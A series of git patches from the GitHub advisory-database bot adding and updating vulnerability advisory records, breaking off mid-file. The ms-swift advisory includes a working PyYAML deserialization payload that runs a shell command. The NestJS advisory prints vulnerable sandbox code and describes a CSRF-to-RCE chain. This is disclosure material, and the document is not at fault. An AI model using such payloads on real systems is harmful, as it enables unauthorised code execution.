"https://discuss.hashicorp.com/t/hcsec-2025-19-vault-login-mfa-bypass-of-rate-limiting-and-totp-token-reuse/76038" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xfj7-2jg6-3957/GHSA-xfj7-2jg6-3957.json b/advisories/unreviewed/2025/08/GHSA-xfj7-2jg6-3957/GHSA-xfj7-2jg6-3957.json new file mode 100644 index 0000000000000..f368cca9e26fc --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xfj7-2jg6-3957/GHSA-xfj7-2jg6-3957.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfj7-2jg6-3957", + "modified": "2025-08-01T18:31:17Z", + "published": "2025-08-01T18:31:17Z", + "aliases": [ + "CVE-2025-52390" + ], + "details": "Saurus CMS Community Edition since commit d886e5b0 (2010-04-23) is vulnerable to a SQL Injection vulnerability in the `prepareSearchQuery()` method in `FulltextSearch.class.php`. The application directly concatenates user-supplied input (`$search_word`) into SQL queries without sanitization, allowing attackers to manipulate the SQL logic and potentially extract sensitive information or escalate their privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52390" + }, + { + "type": "WEB", + "url": "https://github.com/sauruscms/Saurus-CMS-Community-Edition/blob/d886e5b0c1e2b42cd74e2184e7c81c720cd9de6b/classes/FulltextSearch.class.php#L331" + }, + { + "type": "WEB", + "url": "https://github.com/theharshkothari/vulnerability-research/blob/main/CVE-2025-52390.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T16:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xfxw-gr8g-6h57/GHSA-xfxw-gr8g-6h57.json b/advisories/unreviewed/2025/08/GHSA-xfxw-gr8g-6h57/GHSA-xfxw-gr8g-6h57.json new file mode 100644 index 0000000000000..73027bea3d5a9 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xfxw-gr8g-6h57/GHSA-xfxw-gr8g-6h57.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfxw-gr8g-6h57", + "modified": "2025-08-01T18:31:18Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-33118" + ], + "details": "IBM QRadar SIEM 7.5 through 7.5.0 Update Pack 12 is vulnerable to stored cross-site scripting. This vulnerability allows authenticated users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33118" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7241303" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:51Z" + } +} \ No newline at end of file From 7f5d709d04a1eb62b198ea38d475142bbfe17df3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 18:36:23 +0000 Subject: [PATCH 299/323] Publish Advisories GHSA-9mvj-f7w8-pvh2 GHSA-vc8w-jr9v-vj7f GHSA-fm6c-f59h-7mmg GHSA-x22w-82jp-8rvf --- .../GHSA-9mvj-f7w8-pvh2.json | 2 +- .../GHSA-vc8w-jr9v-vj7f.json | 2 +- .../GHSA-fm6c-f59h-7mmg.json | 20 +++++++++++++++++-- .../GHSA-x22w-82jp-8rvf.json | 8 ++++++-- 4 files changed, 26 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2024/07/GHSA-9mvj-f7w8-pvh2/GHSA-9mvj-f7w8-pvh2.json b/advisories/github-reviewed/2024/07/GHSA-9mvj-f7w8-pvh2/GHSA-9mvj-f7w8-pvh2.json index 8c9c7e6cf672f..86b74015767da 100644 --- a/advisories/github-reviewed/2024/07/GHSA-9mvj-f7w8-pvh2/GHSA-9mvj-f7w8-pvh2.json +++ b/advisories/github-reviewed/2024/07/GHSA-9mvj-f7w8-pvh2/GHSA-9mvj-f7w8-pvh2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9mvj-f7w8-pvh2", - "modified": "2025-01-31T16:28:19Z", + "modified": "2025-08-01T18:34:18Z", "published": "2024-07-11T18:31:14Z", "aliases": [ "CVE-2024-6484" diff --git a/advisories/github-reviewed/2024/07/GHSA-vc8w-jr9v-vj7f/GHSA-vc8w-jr9v-vj7f.json b/advisories/github-reviewed/2024/07/GHSA-vc8w-jr9v-vj7f/GHSA-vc8w-jr9v-vj7f.json index bcda7765e29d0..b25eb8ae11c59 100644 --- a/advisories/github-reviewed/2024/07/GHSA-vc8w-jr9v-vj7f/GHSA-vc8w-jr9v-vj7f.json +++ b/advisories/github-reviewed/2024/07/GHSA-vc8w-jr9v-vj7f/GHSA-vc8w-jr9v-vj7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vc8w-jr9v-vj7f", - "modified": "2025-05-16T22:14:28Z", + "modified": "2025-08-01T18:34:16Z", "published": "2024-07-11T18:31:14Z", "aliases": [ "CVE-2024-6531" diff --git a/advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json b/advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json index af7b0d4206948..fb5bdbd20238c 100644 --- a/advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json +++ b/advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fm6c-f59h-7mmg", - "modified": "2025-07-31T14:02:34Z", + "modified": "2025-08-01T18:35:43Z", "published": "2025-07-31T14:02:34Z", "aliases": [ "CVE-2025-50460" @@ -9,6 +9,10 @@ "summary": "MS SWIFT Remote Code Execution via unsafe PyYAML deserialization", "details": "## Description\n\nA Remote Code Execution (RCE) vulnerability exists in the [modelscope/ms-swift](https://github.com/modelscope/ms-swift) project due to unsafe use of `yaml.load()` in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the `tests/run.py` script, where a user-supplied YAML configuration file is deserialized using `yaml.load()` with `yaml.FullLoader`.\n\nIf an attacker can control or replace the YAML configuration file provided to the `--run_config` argument, they may inject a malicious payload that results in arbitrary code execution.\n\n## Affected Repository\n\n- **Project:** [modelscope/ms-swift](https://github.com/modelscope/ms-swift)\n- **Affect versions:** latest\n- **File:** `tests/run.py`\n- **GitHub Permalink:** https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420\n- **Dependency:** PyYAML <= 5.3.1\n\n## Vulnerable Code\n\n```python\nif args.run_config is not None and Path(args.run_config).exists():\n with open(args.run_config, encoding='utf-8') as f:\n run_config = yaml.load(f, Loader=yaml.FullLoader)\n```\n\n## Proof of Concept (PoC)\n\n### Step 1: Create malicious YAML file (`exploit.yaml`)\n\n```yaml\n!!python/object/new:type\nargs: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }]\nlistitems: \"__import__('os').system('mkdir HACKED')\"\n```\n\n### Step 2: Execute with vulnerable PyYAML (<= 5.3.1)\n\n```python\nimport yaml\n\nwith open(\"exploit.yaml\", \"r\") as f:\n cfg = yaml.load(f, Loader=yaml.FullLoader)\n```\n\nThis results in execution of `os.system`, proving code execution.\n\n## Mitigation\n\n* Replace `yaml.load()` with `yaml.safe_load()`\n* Upgrade PyYAML to version 5.4 or later\n\n### Example Fix:\n\n```python\n# Before\nyaml.load(f, Loader=yaml.FullLoader)\n\n# After\nyaml.safe_load(f)\n```\n\n\n## Author\n\n* Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)\n* Contact: *\\[[anchor.rongyu020221@gmail.com](mailto:anchor.rongyu020221@gmail.com)]*", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" @@ -40,6 +44,10 @@ "type": "WEB", "url": "https://github.com/modelscope/ms-swift/security/advisories/GHSA-fm6c-f59h-7mmg" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50460" + }, { "type": "WEB", "url": "https://github.com/modelscope/ms-swift/pull/5174" @@ -52,9 +60,17 @@ "type": "WEB", "url": "https://github.com/Anchor0221/CVE-2025-50460" }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-6757-jp84-gxfx" + }, { "type": "PACKAGE", "url": "https://github.com/modelscope/ms-swift" + }, + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/blob/main/tests/run.py#L420" } ], "database_specific": { @@ -64,6 +80,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2025-07-31T14:02:34Z", - "nvd_published_at": null + "nvd_published_at": "2025-08-01T16:15:41Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-x22w-82jp-8rvf/GHSA-x22w-82jp-8rvf.json b/advisories/github-reviewed/2025/07/GHSA-x22w-82jp-8rvf/GHSA-x22w-82jp-8rvf.json index 52e76b608c687..d9b9e31c036b5 100644 --- a/advisories/github-reviewed/2025/07/GHSA-x22w-82jp-8rvf/GHSA-x22w-82jp-8rvf.json +++ b/advisories/github-reviewed/2025/07/GHSA-x22w-82jp-8rvf/GHSA-x22w-82jp-8rvf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x22w-82jp-8rvf", - "modified": "2025-07-31T19:23:18Z", + "modified": "2025-08-01T18:35:51Z", "published": "2025-07-31T19:23:18Z", "aliases": [ "CVE-2025-48074" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-x22w-82jp-8rvf" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48074" + }, { "type": "PACKAGE", "url": "https://github.com/AcademySoftwareFoundation/openexr" @@ -59,6 +63,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-07-31T19:23:18Z", - "nvd_published_at": null + "nvd_published_at": "2025-08-01T17:15:52Z" } } \ No newline at end of file From a00d8d5dc95eab86fdf5564b34f765d72fff966a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 18:39:38 +0000 Subject: [PATCH 300/323] Publish Advisories GHSA-3jhf-gxhr-q4cx GHSA-7qw8-3vmf-gj32 GHSA-8xq3-w9fx-74rv GHSA-qc2h-74x3-4v3w GHSA-wx6g-fm6f-w822 --- .../GHSA-3jhf-gxhr-q4cx.json | 8 ++++++-- .../GHSA-7qw8-3vmf-gj32.json | 12 +++++++++-- .../GHSA-8xq3-w9fx-74rv.json | 8 ++++++-- .../GHSA-qc2h-74x3-4v3w.json | 16 +++++++++++++-- .../GHSA-wx6g-fm6f-w822.json | 20 +++++++++++++++++-- 5 files changed, 54 insertions(+), 10 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-3jhf-gxhr-q4cx/GHSA-3jhf-gxhr-q4cx.json b/advisories/github-reviewed/2025/07/GHSA-3jhf-gxhr-q4cx/GHSA-3jhf-gxhr-q4cx.json index f5b6071a53f44..614c6ff2c50e9 100644 --- a/advisories/github-reviewed/2025/07/GHSA-3jhf-gxhr-q4cx/GHSA-3jhf-gxhr-q4cx.json +++ b/advisories/github-reviewed/2025/07/GHSA-3jhf-gxhr-q4cx/GHSA-3jhf-gxhr-q4cx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3jhf-gxhr-q4cx", - "modified": "2025-07-31T18:31:11Z", + "modified": "2025-08-01T18:36:02Z", "published": "2025-07-31T18:31:11Z", "aliases": [ "CVE-2025-53010" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-3jhf-gxhr-q4cx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53010" + }, { "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/MaterialX/commit/e13344ba13326869d7820b444705f24d56fab73d" @@ -63,6 +67,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2025-07-31T18:31:11Z", - "nvd_published_at": null + "nvd_published_at": "2025-08-01T18:15:54Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-7qw8-3vmf-gj32/GHSA-7qw8-3vmf-gj32.json b/advisories/github-reviewed/2025/07/GHSA-7qw8-3vmf-gj32/GHSA-7qw8-3vmf-gj32.json index 153ba5c2e88c9..917ae46f2a5f9 100644 --- a/advisories/github-reviewed/2025/07/GHSA-7qw8-3vmf-gj32/GHSA-7qw8-3vmf-gj32.json +++ b/advisories/github-reviewed/2025/07/GHSA-7qw8-3vmf-gj32/GHSA-7qw8-3vmf-gj32.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7qw8-3vmf-gj32", - "modified": "2025-07-31T18:31:24Z", + "modified": "2025-08-01T18:36:10Z", "published": "2025-07-31T18:31:23Z", "aliases": [ "CVE-2025-53011" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-7qw8-3vmf-gj32" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53011" + }, { "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/MaterialX/commit/7ac1c71de5187dc29793292b5a8dc6d784192ecf" @@ -51,6 +55,10 @@ "type": "PACKAGE", "url": "https://github.com/AcademySoftwareFoundation/MaterialX" }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/releases/tag/v1.39.3" + }, { "type": "WEB", "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-53011" @@ -63,6 +71,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2025-07-31T18:31:23Z", - "nvd_published_at": null + "nvd_published_at": "2025-08-01T18:15:54Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-8xq3-w9fx-74rv/GHSA-8xq3-w9fx-74rv.json b/advisories/github-reviewed/2025/07/GHSA-8xq3-w9fx-74rv/GHSA-8xq3-w9fx-74rv.json index f27f885827738..6628cd9b6c863 100644 --- a/advisories/github-reviewed/2025/07/GHSA-8xq3-w9fx-74rv/GHSA-8xq3-w9fx-74rv.json +++ b/advisories/github-reviewed/2025/07/GHSA-8xq3-w9fx-74rv/GHSA-8xq3-w9fx-74rv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8xq3-w9fx-74rv", - "modified": "2025-07-31T12:02:12Z", + "modified": "2025-08-01T18:36:22Z", "published": "2025-07-28T16:41:06Z", "aliases": [ "CVE-2025-54590" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/silverbucket/webfinger.js/security/advisories/GHSA-8xq3-w9fx-74rv" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54590" + }, { "type": "WEB", "url": "https://github.com/silverbucket/webfinger.js/commit/b5f2f2c957297d25f4d76072963fccaee2e3095a" @@ -63,6 +67,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-07-28T16:41:06Z", - "nvd_published_at": null + "nvd_published_at": "2025-08-01T18:15:55Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-qc2h-74x3-4v3w/GHSA-qc2h-74x3-4v3w.json b/advisories/github-reviewed/2025/07/GHSA-qc2h-74x3-4v3w/GHSA-qc2h-74x3-4v3w.json index 043222b5b5a19..56d56db8f30dc 100644 --- a/advisories/github-reviewed/2025/07/GHSA-qc2h-74x3-4v3w/GHSA-qc2h-74x3-4v3w.json +++ b/advisories/github-reviewed/2025/07/GHSA-qc2h-74x3-4v3w/GHSA-qc2h-74x3-4v3w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qc2h-74x3-4v3w", - "modified": "2025-07-31T19:37:51Z", + "modified": "2025-08-01T18:36:16Z", "published": "2025-07-31T19:37:51Z", "aliases": [ "CVE-2025-53012" @@ -43,6 +43,14 @@ "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-qc2h-74x3-4v3w" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53012" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/pull/2233/commits/6182c07467297416a30d148ab531d81198686dc5" + }, { "type": "PACKAGE", "url": "https://github.com/AcademySoftwareFoundation/MaterialX" @@ -50,6 +58,10 @@ { "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/MaterialX/blob/main/documents/Specification/MaterialX.Specification.md#mtlx-file-format-definition" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/releases/tag/v1.39.3" } ], "database_specific": { @@ -59,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-07-31T19:37:51Z", - "nvd_published_at": null + "nvd_published_at": "2025-08-01T18:15:54Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json b/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json index 44403b34e31c5..d7a724589066d 100644 --- a/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json +++ b/advisories/github-reviewed/2025/07/GHSA-wx6g-fm6f-w822/GHSA-wx6g-fm6f-w822.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wx6g-fm6f-w822", - "modified": "2025-08-01T15:59:21Z", + "modified": "2025-08-01T18:35:57Z", "published": "2025-07-31T19:37:48Z", "aliases": [ "CVE-2025-53009" @@ -43,10 +43,26 @@ "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-wx6g-fm6f-w822" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53009" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/issues/2504" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/pull/2505" + }, { "type": "PACKAGE", "url": "https://github.com/AcademySoftwareFoundation/MaterialX" }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/releases/tag/v1.39.3" + }, { "type": "WEB", "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-53009" @@ -59,6 +75,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-07-31T19:37:48Z", - "nvd_published_at": null + "nvd_published_at": "2025-08-01T18:15:54Z" } } \ No newline at end of file From 03c064159e3ad44f2dbef216b3a3432db8968ae8 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 18:45:25 +0000 Subject: [PATCH 301/323] Publish GHSA-85cg-cmq5-qjm7 --- .../GHSA-85cg-cmq5-qjm7.json | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 advisories/github-reviewed/2025/08/GHSA-85cg-cmq5-qjm7/GHSA-85cg-cmq5-qjm7.json diff --git a/advisories/github-reviewed/2025/08/GHSA-85cg-cmq5-qjm7/GHSA-85cg-cmq5-qjm7.json b/advisories/github-reviewed/2025/08/GHSA-85cg-cmq5-qjm7/GHSA-85cg-cmq5-qjm7.json new file mode 100644 index 0000000000000..cea128b2e7f76 --- /dev/null +++ b/advisories/github-reviewed/2025/08/GHSA-85cg-cmq5-qjm7/GHSA-85cg-cmq5-qjm7.json @@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85cg-cmq5-qjm7", + "modified": "2025-08-01T18:43:13Z", + "published": "2025-08-01T18:43:13Z", + "aliases": [ + "CVE-2025-54782" + ], + "summary": "@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers", + "details": "## Summary\nA critical Remote Code Execution (RCE) vulnerability was discovered in the `@nestjs/devtools-integration` package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (`safe-eval`-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.\n\nA full blog post about how this vulnerability was uncovered can be found on [Socket's blog](https://socket.dev/blog/nestjs-rce-vuln).\n\n## Details\nThe `@nestjs/devtools-integration` package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, `/inspector/graph/interact`, accepts JSON input containing a `code` field and executes the provided code in a Node.js `vm.runInNewContext` sandbox.\n\nKey issues:\n1. **Unsafe Sandbox:** The sandbox implementation closely resembles the abandoned `safe-eval` library. The Node.js `vm` module is [explicitly documented](https://nodejs.org/api/vm.html) as not providing a security mechanism for executing untrusted code. Numerous known sandbox escape techniques allow arbitrary code execution.\n2. **Lack of Proper CORS/Origin Checking:** The server sets `Access-Control-Allow-Origin` to a fixed domain (`https://devtools.nestjs.com`) but does not validate the request's `Origin` or `Content-Type`. Attackers can craft POST requests with `text/plain` content type using HTML forms or simple XHR requests, bypassing CORS preflight checks.\n\nBy chaining these issues, a malicious website can trigger the vulnerable endpoint and achieve arbitrary code execution on a developer's machine running the NestJS devtools integration.\n\nRelevant code from the package:\n\n```js\n// Vulnerable request handler\nhandleGraphInteraction(req, res) {\n if (req.method === 'POST') {\n let body = '';\n req.on('data', data => { body += data; });\n req.on('end', async () => {\n res.writeHead(200, { 'Content-Type': 'application/plain' });\n const json = JSON.parse(body);\n await this.sandboxedCodeExecutor.execute(json.code, res);\n });\n }\n}\n\n// Vulnerable sandbox implementation\nrunInNewContext(code, context, opts) {\n const sandbox = {};\n const resultKey = 'SAFE_EVAL_' + Math.floor(Math.random() * 1000000);\n sandbox[resultKey] = {};\n const ctx = `\n (function() {\n Function = undefined;\n const keys = Object.getOwnPropertyNames(this).concat(['constructor']);\n keys.forEach((key) => {\n const item = this[key];\n if (!item || typeof item.constructor !== 'function') return;\n this[key].constructor = undefined;\n });\n })();\n `;\n code = ctx + resultKey + '=' + code;\n if (context) {\n Object.keys(context).forEach(key => { sandbox[key] = context[key]; });\n }\n vm.runInNewContext(code, sandbox, opts);\n return sandbox[resultKey];\n}\n```\n\nBecause the sandbox can be trivially escaped, and the endpoint accepts cross-origin POST requests without proper checks, this vulnerability allows arbitrary code execution on the developer's machine.\n\n## PoC\nCreate a minimal NestJS project and enable @nestjs/devtools-integration in development mode:\n\n```\nnpm install @nestjs/devtools-integration\nnpm run start:dev\n```\n\nUse the following HTML form on any malicious website:\n\n\n```html\n
\n \n \n
\n```\n\nWhen the developer visits the page and submits the form, the local NestJS devtools server executes the injected code, in this case launching the Calculator app on macOS.\n\nAlternatively, the same payload can be sent via a simple XHR request with text/plain content type:\n\n```html\n\n\n```\n\n### Full POC\n\nMinimal reproducer: https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\n\nSteps to reproduce:\n\n1. Clone Repo https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\n2. Run NPM install\n3. Run `npm run start:dev`\n4. Open up the POC site here: https://jlleitschuh.org/nestjs-devtools-integration-rce-poc/\n5. Try out any of the POC payloads.\n\nSource for the `nestjs-devtools-integration-rce-poc`: https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc\n\n## Impact\n\nThis vulnerability is a Remote Code Execution (RCE) affecting developers running a NestJS project with `@nestjs/devtools-integration` enabled. An attacker can exploit it by luring a developer to visit a malicious website, which then sends a crafted POST request to the local devtools HTTP server. This results in arbitrary code execution on the developer’s machine.\n\n- Severity: Critical\n- Attack Complexity: Low (requires only that the victim visits a malicious webpage, or be served malvertising)\n- Privileges Required: None\n- User Interaction: Minimal (no clicks required)\n\n## Fix\nThe maintainers remediated this issue by:\n\n - Replacing the unsafe sandbox implementation with a safer alternative (@nyariv/sandboxjs).\n - Adding origin and content-type validation to incoming requests.\n - Introducing authentication for the devtools connection.\n\nUsers should upgrade to the patched version of @nestjs/devtools-integration as soon as possible.\n\n## Credit\n\nThis vulnerability was uncovered by @JLLeitschuh on behalf of [Socket](https://socket.dev/).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@nestjs/devtools-integration" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.2.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.2.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7" + }, + { + "type": "WEB", + "url": "https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nestjs/nest" + }, + { + "type": "WEB", + "url": "https://jlleitschuh.org/nestjs-devtools-integration-rce-poc" + }, + { + "type": "WEB", + "url": "https://socket.dev/blog/nestjs-rce-vuln" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352", + "CWE-77", + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2025-08-01T18:43:13Z", + "nvd_published_at": null + } +} \ No newline at end of file From 558090ebe4e3204e03c96beb64610712d1c39c58 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 19:19:20 +0000 Subject: [PATCH 302/323] Publish GHSA-rxf6-323f-44fc --- .../07/GHSA-rxf6-323f-44fc/GHSA-rxf6-323f-44fc.json | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-rxf6-323f-44fc/GHSA-rxf6-323f-44fc.json b/advisories/github-reviewed/2025/07/GHSA-rxf6-323f-44fc/GHSA-rxf6-323f-44fc.json index c58a37af05569..629b14689a381 100644 --- a/advisories/github-reviewed/2025/07/GHSA-rxf6-323f-44fc/GHSA-rxf6-323f-44fc.json +++ b/advisories/github-reviewed/2025/07/GHSA-rxf6-323f-44fc/GHSA-rxf6-323f-44fc.json @@ -1,13 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-rxf6-323f-44fc", - "modified": "2025-07-07T21:59:34Z", + "modified": "2025-08-01T19:17:10Z", "published": "2025-07-05T03:30:23Z", - "aliases": [ - "CVE-2025-53605" - ], - "summary": "rust-protobuf crate is vulnerable to Uncontrolled Recursion, potentially leading to DoS", - "details": "The protobuf crate before 3.7.2 for Rust allows uncontrolled recursion in the protobuf::coded_input_stream::CodedInputStream::skip_group parsing of unknown fields in untrusted input.", + "withdrawn": "2025-08-01T19:17:10Z", + "aliases": [], + "summary": "Duplicate Advisory: rust-protobuf crate is vulnerable to Uncontrolled Recursion, potentially leading to DoS", + "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-2gh3-rmm4-6rq5. This link is maintained to preserve external references.\n\n###\nThe protobuf crate before 3.7.2 for Rust allows uncontrolled recursion in the protobuf::coded_input_stream::CodedInputStream::skip_group parsing of unknown fields in untrusted input.", "severity": [ { "type": "CVSS_V3", From d49675f4fa3ac9a3e5673c916e0a722b60a860a4 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 19:22:34 +0000 Subject: [PATCH 303/323] Publish GHSA-2gh3-rmm4-6rq5 --- .../03/GHSA-2gh3-rmm4-6rq5/GHSA-2gh3-rmm4-6rq5.json | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2025/03/GHSA-2gh3-rmm4-6rq5/GHSA-2gh3-rmm4-6rq5.json b/advisories/github-reviewed/2025/03/GHSA-2gh3-rmm4-6rq5/GHSA-2gh3-rmm4-6rq5.json index 36fb97ad93923..4de56065f4929 100644 --- a/advisories/github-reviewed/2025/03/GHSA-2gh3-rmm4-6rq5/GHSA-2gh3-rmm4-6rq5.json +++ b/advisories/github-reviewed/2025/03/GHSA-2gh3-rmm4-6rq5/GHSA-2gh3-rmm4-6rq5.json @@ -1,9 +1,11 @@ { "schema_version": 